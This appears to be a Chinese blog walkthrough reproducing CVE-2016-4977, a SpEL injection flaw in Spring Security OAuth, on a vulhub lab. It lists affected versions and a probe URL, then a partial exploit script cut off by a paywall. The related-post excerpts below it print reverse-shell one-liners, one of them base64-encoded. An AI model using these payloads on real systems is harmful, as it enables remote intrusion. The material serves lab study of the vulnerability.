CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末

俺不想学习

已于 2022-08-10 15:38:50 修改

阅读量1.6k

点赞数 2

CC 4.0 BY-SA版权

文章标签：漏洞复现

于 2022-08-10 15:35:10 首次发布

本文链接：https://blog.csdn.net/weixin_45715461/article/details/126267708

影响版本

Spring Security OAuth 1.0.0到1.0.5
Spring Security OAuth 2.0.0到2.0.9
Spring Security OAuth 2.0到2.0.14
Spring Security OAuth 2.1到2.1.1
Spring Security OAuth 2.2到2.2.1
Spring Security OAuth 2.3到2.3.2

环境搭建

进入vulhub漏洞文件架中，进行拉取即可

cd vulhub-master/spring/CVE-2016-4977
docker-compose up -d

漏洞复现

进入漏洞的url192.168.29.129:8080/oauth/authorize，发现需要我们进行登录，这里根据弱口令admin/admin进行登录。

登录成功

输入SpEL表达式查看是否能被解析并且执行，发现执行成功，说明存在漏洞

http://192.168.29.129:8080/oauth/authorize?response_type=${9*9}&client_id=acme&scope=openid&redirect_uri=http://test

POC、EXP的编写

在网上找了一圈之后，发现没找到，于是自己写了下POC、EXP，思路如下

由于是需要登录的，所以我们先进行抓包构造登录数据。

然后就是发送一个登录的数据包，并且还要带上验证是否能够被解析执行的SpEL表达式，到这里为止，POC的编写就成功了。

关于EXP反弹shell的编写，需要我们首先编写反弹shell的代码进行bash64加密，然后再经过ascii加密之后，再进行发送即可。

代码如下：

import os
import requests
import base64

def poc(url):
    headers = {
   
   
        'Authorizatio

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

俺不想学习

关注关注

2
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

复现CVE-2016-4977——Spring Security OAuth2 远程命令执行漏洞

记录并分享学习安全的知识点..

01-15

1004

一、漏洞概述 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时，由于使用了Springs Expression Language (SpEL)，攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。二、漏洞复现发现页面如下： poc如下： http://your-ip:8080/oauth/authorize?response_type=[POC]&client_id=acme

CVE-2016-4977 Spring security OAuth2 远程命令执行

flighting019的博客

10-26

136

由于是从幕布导出来的，格式有点乱，大家见谅。至于关闭容器，退出就不多说了。该poc.py的代码如下。

1 条评论您还未登录，请先登录后发表或查看评论

用Docker复现SpringBoot CVE-2016-4977

m0_69555575的博客

08-22

732

Docker复现SpringBoot CVE-2016-4977

[复现] CVE-2025-33053

最新发布

安全小白，希望我的文章对你有所帮助。

06-29

1325

本地复现CVE-2025-33053

Spring Security OAuth2 远程命令执行漏洞（CVE-2016-4977）

qq_54713392的博客

05-08

869

Spring Security OAuth2 远程命令执行漏洞（CVE-2016-4977）漏洞原理： Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图，response_type参数值会被当做Spring SpEL来执行，恶意攻击者通过构造response_type值可以触发远程代码执行漏洞攻击机：window10 IP:192.168.32.1 靶机：ubantu16.04 IP：192.168.32.142 （1）在vulhub靶场...

CVE-2016-4977Spring Security OAuth2 远程命令执行漏洞

weixin_54376843的博客

08-29

418

在其使用 whitelabel views 来处理错误时，由于使用了Springs Expression Language (SpEL)，攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。然后输入构造好的反弹shell命令，回车继续执行。把执行结果粘贴出来，放在下面的payload中。将命令base64编码【随便找一个编码的网站。执行上面的脚本【在放脚本的目录下执行】输入账号密码admin admin。【攻击机IP+开启监听的端口】构造反弹shell命令【备用】最后去靶机关闭docker容器。

CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现

weixin_45715461的博客

07-10

3488

CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现

DataEase 未授权+远程代码执行漏洞复现(CVE-2025-49001、CVE-2025-49002)

李同學的安全圈

06-10

856

DataEase 是一款开源的数据分析平台，提供丰富的数据可视化和分析功能，帮助用户轻松地进行数据探索和决策支持。近日，有关DataEase 被爆出多个漏洞，其中 CVE-2025-49001 是由于JWT校验机制错误导致攻击者可伪造JWT令牌绕过身份验证流程，CVE-2025-49002 是由于H2数据库模块没有严格过滤用户输入的JDBC连接参数，可使用大小写绕过补丁。攻击者可利用这些漏洞实现未授权代码执行，威胁用户数据和系统的安全。

CVE-2024-38819：Spring 框架路径遍历 PoC 漏洞复现

m0_74825541的博客

01-16

813

注意在创建的时候有些镜像无法拉取到，可以在Dockerfile文件中修改配置使用其他的镜像。：通过创建符号链接，攻击者可以尝试构造一个路径遍历的恶意 URL。该漏洞利用了路径遍历问题，使攻击者能够访问系统中本不应暴露的文件（如。攻击者能够进一步利用该信息来获取其他敏感数据或执行任意代码。这段代码创建了一个静态文件资源的路由。目录“跳出”并访问系统的其他目录（如。来尝试获取指向其他系统路径的文件。拿到环境的源码使用docker搭建。文件的内容，证明存在该漏洞。），从而获取系统敏感信息。

漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273

weixin_45556536的博客

12-24

1574

CVE-2017-4971 // 注意反弹的端口和IP修改，反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub

CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)

精品博客,你值得一看~

09-02

2008

它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图，response_type参数值会被当做Spring SpEL来执行，恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.

【spring漏洞复现】CVE-2016-4977+CVE-2017-8046+CVE-2017-4971+CVE-2018-1270+CVE-2018-1273远程命令执行漏洞

serendipity1130的博客

09-01

720

1.CVE-2016-4977 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时，由于使用了Springs Expression Language(SpEL)，攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 1.访问网址： http://192.168.225.139:8080/oauth/authorize?response_type=${233*233}&client

SpringSecurityOauth RCE (CVE-2016-4977) 分析与复现

weixin_33862514的博客

02-14

799

目录 0x00 前言 0x01 调试分析 0x02 补丁分析 0x03 参考影响版本： 2.0.0-2.0.9 1.0.0-1.0.5 0x00 前言这个漏洞与之前那个SpringBoot的SpEL表达式注入漏洞点基本一样，而且漏洞爆出来的时间点也差不多，可是...

vulhub-CVE-2016-4977-SpringSecurityOauth RCE复现记录

weixin_42513429的博客

08-19

336

https://www.cnblogs.com/litlife/p/10380701.html https://blog.csdn.net/qq_45300786/article/details/119249422 参考别人的博客，对CVE-2016-4977进行复现 Spring Security OAuth SpEL表达式注入影响范围（复制来的）： Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring .

Spring Security OAuth2 远程命令执行漏洞（CVE-2016-4977）

EC_Carrot的博客

08-02

790

漏洞简介 Pivotal Spring Security OAuth 2.0.0版本至2.0.9版本和1.0.0版本至1.0.5版本中存在安全漏洞。远程攻击者可通过为‘response_type’参数制作值利用该漏洞执行代码。漏洞复现我们来进行反弹shell的操作，首先将bash命令进行编码： bash -i >& /dev/tcp/your-ip/9999 0>&1 我这里使用的是vulhub的环境，环境内有一个poc.py，用python3运行该脚本后，会让你输入字符

CVE-2016-4977（RCE漏洞）

datong_dasima的博客

02-19

477

其中YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjE0MS82OSAwPiYx是进行了base64编码，解码后就是经典反弹shell命令：bash -i >& /dev/tcp/192.168.11.141/4444 0>&1。2.用棱角社区制作反弹shell，ip和端口都是kali的：192.168.11.141：69。显示了4*4的结果，说明可以执行我们自己的代码，那我们想获取对方shell。将其拼接到url里，注意url里面不要有换行符。然后，执行poc.py。

cve-2016-4977(spring-security-oauth) RCE漏洞复现

m0_58596609的博客

04-21

5976

cve-2016-4977(spring-security-oauth) RCE漏洞复现

漏洞复现笔记（CVE-2016-4977）

weixin_72760965的博客

06-14

432

Spring Security OAuth 是为了Spring 框架提供安全认证支持的一个模块。在其使用 white label views 来处理错误时，由于使用了Springs Expression Language（SpEL），攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令影响范围环境搭建进入靶场开启靶场查看靶场信息docker ps访问网址。

SMBv3远程代码执行漏洞CVE-2020-0796防护指南

综上所述，CVE-2020-0796漏洞的POC文件能够用来在受影响的系统上证明远程代码执行的可能性，因此对于网络安全专业人士来说，了解这种漏洞和相关的POC文件是十分必要的。它们在安全测试、漏洞管理和提高网络安全意识...